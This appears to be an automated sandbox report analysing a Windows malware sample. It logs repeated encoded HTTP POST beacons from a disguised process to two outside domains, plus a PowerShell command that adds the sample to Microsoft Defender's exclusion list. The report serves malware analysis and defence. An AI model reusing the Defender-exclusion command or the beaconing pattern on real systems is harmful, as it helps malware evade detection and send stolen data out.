Nov 2, 2024 05:28:39.679719925 CET	1057	IN	HTTP/1.1 404 Not Found Date: Sat, 02 Nov 2024 04:28:39 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B3bajX7CjaCeYITsG5Msss%2F4sb6tLdF6lwKgfSKnOOSv7fsN%2B5VF6MG2XtctP9kGj8HkyUGdpAWP5be3YOh5shwxa0OrCUSyL9VZMYWVZv52jf%2F6BKWVjqbQsLrxb2buZLtGPSQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8dc1610a3c10b78f-DFW alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=1901&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=435&delivery_rate=0&cwnd=41&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 31 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 70 72 69 64 65 67 72 6f 76 65 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 118<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at www.pridegrove.net Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	50052	195.154.200.15	80	2124	C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe

Timestamp	Bytes transferred	Direction	Data
Nov 2, 2024 05:28:44.790575027 CET	680	OUT	POST /5p40/ HTTP/1.1 Host: www.budged.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Content-Length: 205 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Origin: http://www.budged.net Referer: http://www.budged.net/5p40/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/40.0 Data Raw: 4f 72 73 4c 62 66 53 38 3d 31 53 77 5a 52 73 64 6c 31 47 37 62 38 78 69 48 44 76 32 52 38 50 32 39 76 64 6a 73 45 6f 33 58 39 4a 63 59 74 53 52 6e 57 74 54 41 49 6d 57 72 37 78 6a 51 51 70 78 74 6f 77 58 35 47 30 5a 31 43 36 68 4b 79 71 34 59 2f 73 68 77 4c 75 30 79 76 6d 49 63 76 67 6c 74 38 54 31 4b 4a 33 6f 65 64 4d 61 37 64 30 57 4b 73 36 6f 78 47 6f 6c 54 47 6d 33 4e 32 70 6c 53 5a 33 36 33 76 56 47 6a 42 6b 45 66 56 77 4a 49 69 4d 47 77 6a 39 73 33 32 4f 4c 70 4c 4f 58 50 6b 62 74 6a 74 49 53 6d 52 4b 45 42 71 56 50 56 73 64 55 79 64 52 44 69 39 41 76 62 51 6e 44 50 62 4d 68 78 63 4e 74 2b 47 67 3d 3d Data Ascii: OrsLbfS8=1SwZRsdl1G7b8xiHDv2R8P29vdjsEo3X9JcYtSRnWtTAImWr7xjQQpxtowX5G0Z1C6hKyq4Y/shwLu0yvmIcvglt8T1KJ3oedMa7d0WKs6oxGolTGm3N2plSZ363vVGjBkEfVwJIiMGwj9s32OLpLOXPkbtjtISmRKEBqVPVsdUydRDi9AvbQnDPbMhxcNt+Gg==
Nov 2, 2024 05:28:45.834367037 CET	1236	IN	HTTP/1.0 404 Not Found Date: Sat, 02 Nov 2024 04:28:45 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.33 X-Powered-By: PHP/7.4.33 Content-Length: 1840 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 23 6e 6f 74 66 6f 75 6e 64 20 7b 0a 20 20 20 20 [TRUNCATED] Data Ascii: <!doctype html><html lang="en"><head> <meta charset="UTF-8"> <title>404</title> <style> * { -webkit-box-sizing: border-box; box-sizing: border-box } body { font-family: sans-serif; padding: 0; margin: 0 } #notfound { position: relative; height: 100vh } #notfound .notfound { position: absolute; left: 50%; top: 50%; -webkit-transform: translate(-50%, -50%); -ms-transform: translate(-50%, -50%); transform: translate(-50%, -50%) } .notfound { max-width: 767px; width: 100%; line-height: 1.4; padding: 0 15px } .notfound .notfound-404 { position: relative; height: 150px; line-height: 150px; margin-bottom: 25px } .notfound .not
Nov 2, 2024 05:28:45.834386110 CET	836	IN	Data Raw: 66 6f 75 6e 64 2d 34 30 34 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 36 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 20 20 20 20 20 Data Ascii: found-404 h1 { font-size: 186px; font-weight: 900; margin: 0; text-transform: uppercase; } .notfound h2 { font-size: 26px; font-weight: 700; m

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	50053	195.154.200.15	80	2124	C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe

Timestamp	Bytes transferred	Direction	Data
Nov 2, 2024 05:28:47.338193893 CET	700	OUT	POST /5p40/ HTTP/1.1 Host: www.budged.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Content-Length: 225 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Origin: http://www.budged.net Referer: http://www.budged.net/5p40/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/40.0 Data Raw: 4f 72 73 4c 62 66 53 38 3d 31 53 77 5a 52 73 64 6c 31 47 37 62 6d 52 53 48 46 4d 75 52 36 76 32 36 32 74 6a 73 52 59 33 62 39 4a 51 59 74 57 41 69 4b 50 48 41 49 45 2b 72 34 7a 48 51 54 70 78 74 38 67 58 77 4c 55 5a 69 43 36 64 6b 79 76 41 59 2f 76 64 77 4c 76 45 79 76 52 55 62 39 67 6c 76 78 7a 31 4d 4e 33 6f 65 64 4d 61 37 64 30 71 77 73 36 67 78 48 59 31 54 48 44 44 4f 2b 4a 6c 64 4f 48 36 33 72 56 47 6e 42 6b 46 4b 56 79 74 32 69 50 2b 77 6a 34 49 33 31 63 7a 75 65 65 58 4a 37 4c 73 48 6b 4b 4c 74 5a 59 4d 49 69 6b 50 58 68 65 39 52 63 58 4f 34 73 78 4f 4d 43 6e 6e 38 47 4c 6f 46 52 4f 51 33 64 6e 74 6b 37 31 54 31 49 64 69 33 2f 57 6e 53 58 37 37 64 2f 67 51 3d Data Ascii: OrsLbfS8=1SwZRsdl1G7bmRSHFMuR6v262tjsRY3b9JQYtWAiKPHAIE+r4zHQTpxt8gXwLUZiC6dkyvAY/vdwLvEyvRUb9glvxz1MN3oedMa7d0qws6gxHY1THDDO+JldOH63rVGnBkFKVyt2iP+wj4I31czueeXJ7LsHkKLtZYMIikPXhe9RcXO4sxOMCnn8GLoFROQ3dntk71T1Idi3/WnSX77d/gQ=
Nov 2, 2024 05:28:48.382601023 CET	1236	IN	HTTP/1.0 404 Not Found Date: Sat, 02 Nov 2024 04:28:48 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.33 X-Powered-By: PHP/7.4.33 Content-Length: 1840 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 23 6e 6f 74 66 6f 75 6e 64 20 7b 0a 20 20 20 20 [TRUNCATED] Data Ascii: <!doctype html><html lang="en"><head> <meta charset="UTF-8"> <title>404</title> <style> * { -webkit-box-sizing: border-box; box-sizing: border-box } body { font-family: sans-serif; padding: 0; margin: 0 } #notfound { position: relative; height: 100vh } #notfound .notfound { position: absolute; left: 50%; top: 50%; -webkit-transform: translate(-50%, -50%); -ms-transform: translate(-50%, -50%); transform: translate(-50%, -50%) } .notfound { max-width: 767px; width: 100%; line-height: 1.4; padding: 0 15px } .notfound .notfound-404 { position: relative; height: 150px; line-height: 150px; margin-bottom: 25px } .notfound .not
Nov 2, 2024 05:28:48.382633924 CET	836	IN	Data Raw: 66 6f 75 6e 64 2d 34 30 34 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 36 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 20 20 20 20 20 Data Ascii: found-404 h1 { font-size: 186px; font-weight: 900; margin: 0; text-transform: uppercase; } .notfound h2 { font-size: 26px; font-weight: 700; m

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	50054	195.154.200.15	80	2124	C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe

Timestamp	Bytes transferred	Direction	Data
Nov 2, 2024 05:28:49.885962009 CET	10782	OUT	POST /5p40/ HTTP/1.1 Host: www.budged.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Content-Length: 10305 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Origin: http://www.budged.net Referer: http://www.budged.net/5p40/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/40.0 Data Raw: 4f 72 73 4c 62 66 53 38 3d 31 53 77 5a 52 73 64 6c 31 47 37 62 6d 52 53 48 46 4d 75 52 36 76 32 36 32 74 6a 73 52 59 33 62 39 4a 51 59 74 57 41 69 4b 50 66 41 49 58 47 72 37 53 48 51 53 70 78 74 2f 67 58 39 4c 55 5a 6a 43 36 46 67 79 76 46 74 2f 71 5a 77 4e 4e 38 79 2f 67 55 62 6e 77 6c 76 34 54 31 4a 4a 33 70 4b 64 4d 4b 33 64 31 47 77 73 36 67 78 48 65 35 54 58 6d 33 4f 7a 70 6c 53 5a 33 36 7a 76 56 47 50 42 6b 63 39 56 79 70 6d 69 2f 65 77 6a 59 59 33 77 70 66 75 44 75 58 4c 36 4c 73 66 6b 4b 33 69 5a 59 52 78 69 6b 37 35 68 64 68 52 64 41 58 63 7a 44 58 54 66 48 50 37 53 72 42 6c 58 75 30 4c 57 55 6f 52 32 56 33 54 4e 63 47 35 78 32 50 57 54 34 58 44 2b 30 72 4b 4e 47 69 58 56 79 70 51 4b 45 64 2b 77 6b 34 69 4e 53 6a 54 34 38 58 69 7a 44 36 67 37 66 79 71 43 72 51 6b 4a 73 45 34 49 78 79 58 2b 61 33 41 61 30 46 57 6e 32 74 58 79 70 59 59 33 43 36 5a 69 70 68 70 42 53 77 46 75 45 36 57 36 51 6e 44 55 31 56 76 65 41 51 41 6d 49 4a 47 72 52 41 72 45 68 30 37 4f 63 69 61 35 51 51 48 42 42 4f 6a 75 [TRUNCATED] Data Ascii: OrsLbfS8=1SwZRsdl1G7bmRSHFMuR6v262tjsRY3b9JQYtWAiKPfAIXGr7SHQSpxt/gX9LUZjC6FgyvFt/qZwNN8y/gUbnwlv4T1JJ3pKdMK3d1Gws6gxHe5TXm3OzplSZ36zvVGPBkc9Vypmi/ewjYY3wpfuDuXL6LsfkK3iZYRxik75hdhRdAXczDXTfHP7SrBlXu0LWUoR2V3TNcG5x2PWT4XD+0rKNGiXVypQKEd+wk4iNSjT48XizD6g7fyqCrQkJsE4IxyX+a3Aa0FWn2tXypYY3C6ZiphpBSwFuE6W6QnDU1VveAQAmIJGrRArEh07Ocia5QQHBBOjuAq5SYoOlqRKQqGHLzpAGC8qNrpPqoBkew5vIYYimLFfXbWCbqzhVYFhVkVLjr8GzjNJNhETR1X5LjLmnXFdwbYGTMivpe88zCzvjpIvTtR3q2+GPO0tJz01R5BzgzKm7dEqltYXP/0EDCNy1UWjpWG6HvfyAQ+AwEKw7or9UObwE0lvW+Wr3DTGRHXtJCrq+6CdCgyM7TmPyrqUdpLHst/QDF7h09OmHTnDeAxqUI56LxBsAan4sAjlyNNPyCWdZzdCOo9kYj++XXtSWEJcQisJ9YNOHpKMr9Kqv8ttIvhom3qFgkKjsGddB/ynuumk6KsS3CY/hTHj9MyuH769l/TUf+xjwdSntwCPqRvedbQxf8mOmhz2oF/knRjLE9OTgxaVmgF+8xXIAd5sl9hZOn1geks1YtxoK0kkweUjnbXTRVtK13akKyIlUlefN8LqmbrHfXQxgIIrV+txOfSVpa1sze9KZCJKN+ULgolw1hzIzfQKBTRBirGew1UIpujZb0oybAbSQ3aRWJuWQIpWYQ2bEzvPKZ2IEBKKhjNsz10fqaJ8dNsZqHlqEXTPFIB5Zxi7FTiGuEsD9AglqYyE2fE8guqQCsn6v/pmRRYh5lAs3GFLQkby0Im4slVtDPJ2JuCrB1a+y3tEPqzQSbhmJR7xJdPgxFg1P2N [TRUNCATED]
Nov 2, 2024 05:28:50.828212976 CET	1236	IN	HTTP/1.0 404 Not Found Date: Sat, 02 Nov 2024 04:28:50 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.33 X-Powered-By: PHP/7.4.33 Content-Length: 1840 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 23 6e 6f 74 66 6f 75 6e 64 20 7b 0a 20 20 20 20 [TRUNCATED] Data Ascii: <!doctype html><html lang="en"><head> <meta charset="UTF-8"> <title>404</title> <style> * { -webkit-box-sizing: border-box; box-sizing: border-box } body { font-family: sans-serif; padding: 0; margin: 0 } #notfound { position: relative; height: 100vh } #notfound .notfound { position: absolute; left: 50%; top: 50%; -webkit-transform: translate(-50%, -50%); -ms-transform: translate(-50%, -50%); transform: translate(-50%, -50%) } .notfound { max-width: 767px; width: 100%; line-height: 1.4; padding: 0 15px } .notfound .notfound-404 { position: relative; height: 150px; line-height: 150px; margin-bottom: 25px } .notfound .not
Nov 2, 2024 05:28:50.828349113 CET	836	IN	Data Raw: 66 6f 75 6e 64 2d 34 30 34 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 36 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 20 20 20 20 20 Data Ascii: found-404 h1 { font-size: 186px; font-weight: 900; margin: 0; text-transform: uppercase; } .notfound h2 { font-size: 26px; font-weight: 700; m

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	50055	195.154.200.15	80	2124	C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe

Timestamp	Bytes transferred	Direction	Data
Nov 2, 2024 05:28:52.431206942 CET	431	OUT	GET /5p40/?OrsLbfS8=4QY5SYttqFPm1GPXCeeb59yMycudIMCosZoH9HQnPeP1XGLlojbxec8co2b1OCtaI7lF7PRey/VXHNAqh2cV8R44wHFaAEsLTvLEVRe4kIA7XM58BnjLzpU=&5Js0X=9zex_vxPfbpDzDPp HTTP/1.1 Host: www.budged.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/40.0
Nov 2, 2024 05:28:53.438618898 CET	1236	IN	HTTP/1.0 404 Not Found Date: Sat, 02 Nov 2024 04:28:53 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.33 X-Powered-By: PHP/7.4.33 Content-Length: 1840 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 23 6e 6f 74 66 6f 75 6e 64 20 7b 0a 20 20 20 20 [TRUNCATED] Data Ascii: <!doctype html><html lang="en"><head> <meta charset="UTF-8"> <title>404</title> <style> * { -webkit-box-sizing: border-box; box-sizing: border-box } body { font-family: sans-serif; padding: 0; margin: 0 } #notfound { position: relative; height: 100vh } #notfound .notfound { position: absolute; left: 50%; top: 50%; -webkit-transform: translate(-50%, -50%); -ms-transform: translate(-50%, -50%); transform: translate(-50%, -50%) } .notfound { max-width: 767px; width: 100%; line-height: 1.4; padding: 0 15px } .notfound .notfound-404 { position: relative; height: 150px; line-height: 150px; margin-bottom: 25px } .notfound .not
Nov 2, 2024 05:28:53.438641071 CET	836	IN	Data Raw: 66 6f 75 6e 64 2d 34 30 34 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 36 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 20 20 20 20 20 Data Ascii: found-404 h1 { font-size: 186px; font-weight: 900; margin: 0; text-transform: uppercase; } .notfound h2 { font-size: 26px; font-weight: 700; m

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.4	50056	103.191.208.137	80	2124	C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe

Timestamp	Bytes transferred	Direction	Data
Nov 2, 2024 05:28:59.283668995 CET	707	OUT	POST /u8o6/ HTTP/1.1 Host: www.roopiedutech.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Content-Length: 205 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Origin: http://www.roopiedutech.online Referer: http://www.roopiedutech.online/u8o6/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/40.0 Data Raw: 4f 72 73 4c 62 66 53 38 3d 70 63 47 61 74 54 77 4c 7a 51 52 55 6d 4d 47 74 61 71 56 32 31 68 68 56 49 4e 37 6b 30 51 68 50 4b 5a 76 69 62 48 4d 61 43 4b 6b 72 62 67 4e 47 6a 58 69 39 5a 5a 37 43 5a 58 78 43 64 39 4d 33 57 4d 50 4e 76 4b 6c 52 74 50 64 78 66 6b 48 66 5a 79 62 38 4a 31 42 4d 65 75 70 71 51 37 46 55 35 76 30 4e 36 35 35 4f 4e 67 6d 50 77 48 61 32 36 72 75 4f 4a 51 59 4c 42 71 76 72 6b 6b 77 7a 44 4f 74 6b 30 64 5a 50 50 4c 34 51 46 37 5a 59 53 50 66 43 63 51 42 52 50 4d 51 62 74 51 4d 43 32 6d 4d 59 6a 4e 2f 73 71 59 35 33 70 52 2b 7a 71 74 2f 30 58 64 57 65 4a 65 6a 75 31 41 4c 6c 53 77 3d 3d Data Ascii: OrsLbfS8=pcGatTwLzQRUmMGtaqV21hhVIN7k0QhPKZvibHMaCKkrbgNGjXi9ZZ7CZXxCd9M3WMPNvKlRtPdxfkHfZyb8J1BMeupqQ7FU5v0N655ONgmPwHa26ruOJQYLBqvrkkwzDOtk0dZPPL4QF7ZYSPfCcQBRPMQbtQMC2mMYjN/sqY53pR+zqt/0XdWeJeju1ALlSw==

Session ID	Source IP	Source Port	Destination IP	Destination Port
50	192.168.2.4	50057	103.191.208.137	80

Timestamp	Bytes transferred	Direction	Data
Nov 2, 2024 05:29:02.200016975 CET	727	OUT	POST /u8o6/ HTTP/1.1 Host: www.roopiedutech.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Content-Length: 225 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Origin: http://www.roopiedutech.online Referer: http://www.roopiedutech.online/u8o6/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/40.0 Data Raw: 4f 72 73 4c 62 66 53 38 3d 70 63 47 61 74 54 77 4c 7a 51 52 55 6e 73 32 74 4a 35 39 32 30 42 68 57 45 74 37 6b 36 41 68 4c 4b 5a 7a 69 62 46 68 64 43 59 77 72 62 42 39 47 69 55 36 39 59 5a 37 43 42 48 78 44 46 64 4d 6f 57 4d 44 7a 76 4b 5a 52 74 50 4a 78 66 6c 33 66 5a 42 44 39 4a 6c 42 53 4c 2b 70 73 55 37 46 55 35 76 30 4e 36 35 38 5a 4e 67 75 50 7a 79 4b 32 34 4f 61 4e 46 77 59 49 57 61 76 72 79 55 77 33 44 4f 74 4b 30 5a 59 69 50 49 41 51 46 2b 64 59 53 65 66 42 56 51 42 54 52 38 51 4e 6d 51 52 36 33 57 4a 4a 6a 4d 4b 58 6a 59 35 39 73 58 7a 70 37 63 65 6a 46 64 79 74 55 5a 71 61 34 44 32 73 4a 7a 33 2f 2b 38 79 6c 58 4e 33 69 67 49 45 68 34 67 2b 66 79 30 6f 3d Data Ascii: OrsLbfS8=pcGatTwLzQRUns2tJ5920BhWEt7k6AhLKZzibFhdCYwrbB9GiU69YZ7CBHxDFdMoWMDzvKZRtPJxfl3fZBD9JlBSL+psU7FU5v0N658ZNguPzyK24OaNFwYIWavryUw3DOtK0ZYiPIAQF+dYSefBVQBTR8QNmQR63WJJjMKXjY59sXzp7cejFdytUZqa4D2sJz3/+8ylXN3igIEh4g+fy0o=

Target ID:	0
Start time:	00:24:54
Start date:	02/11/2024
Path:	C:\Users\user\Desktop\A4mmSHCUi2.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\A4mmSHCUi2.exe"
Imagebase:	0x6d0000
File size:	1'049'600 bytes
MD5 hash:	53BECF41BA02FDBC491515BA9CF6CC96
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	00:24:56
Start date:	02/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\A4mmSHCUi2.exe"
Imagebase:	0x680000
File size:	433'152 bytes
